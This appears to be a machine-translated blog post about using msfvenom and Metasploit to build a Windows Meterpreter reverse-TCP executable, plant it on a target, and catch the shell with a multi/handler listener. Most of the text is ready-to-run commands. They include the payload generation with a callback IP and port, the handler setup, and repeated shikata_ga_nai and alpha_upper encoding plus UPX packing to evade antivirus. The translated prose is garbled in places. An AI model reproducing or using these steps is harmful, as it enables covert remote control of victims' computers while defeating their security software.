Msfvenom makes master and controlled terminals

• msfconsole
• msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.107.135 lport 5000 -f exe -o /var/payload.exe

explain ：-p or --payload Followed by load see msf Which loads can pass msfvenom -l payloads command

           lhost Fill in the master terminal IP     lpost Fill in the master port

          -f or --format  Format of output file

         -o or --out  Specify file storage path

         --payload-options   // list payload Standard parameter item of

        --help-formats      // list msf Supported output file formats

About msfvenom For more detailed parameter usage, please refer to ：Metasploit——msfvenom Don't kill the Trojan horse _ Little white @ The blog of -CSDN Blog _msfvenom No killing

Generated payload.exe It is stored at the controlled end by various methods

At the main control end msfconsole perform

•             use exploit/multi/handler
•             set payload windows/meterpreter/reverse_tcp  // It needs to be related to the generation of the controlled end payload Agreement
•             set lhost 192.168.107.135
•             set lport 5000  // These two must be the same as the main control end set when generating the controlled end IP Same as port
•             exploit

The controlled end executes payload.exe after , Information can be seen at the master ：

At this time, the main control end and the controlled end are connected . But because this tool is rotten , Generally, the generated controlled end will be checked and killed , Therefore, the controlled end is usually recoded .

msf The coding function in the framework can recode the controlled end , Multiple encoding , Mixed coding in many ways

perform msfvenom -l encoder You can view the encoder list ,excellent The encoder of level 1 is better

• msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.135 lport=5000 -e x86/nonalpha -f c

The output format here is C, You can see the coding result on the screen , Want to know many times 、 Mixed coding effect can output this format , Compare low The code encoded by is unchanged , As in the above example .

• msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.107.135 LPORT=5000 -e x86/shikata_ga_nai -i 10 -f raw |msfvenom -a x86 --platform Windows -e x86/alpha_upper -i 5 -f exe -o /var/payload.exe

The command above -i 10 It means code 10, Mixed coding needs to be written many times msfvenom Use and combine | Separate  

The second code cannot be missing --platform Windows, Will not carry out , The first kind of code will report an error if it is written or not , But you can continue , The reason is unknown

  Even if it is encoded many times , Most of them were also found out , You can use “ shell ” The way to

upx /var/payload.exe

This article only records ideas and commands , Most of the accused end operated as above will still be killed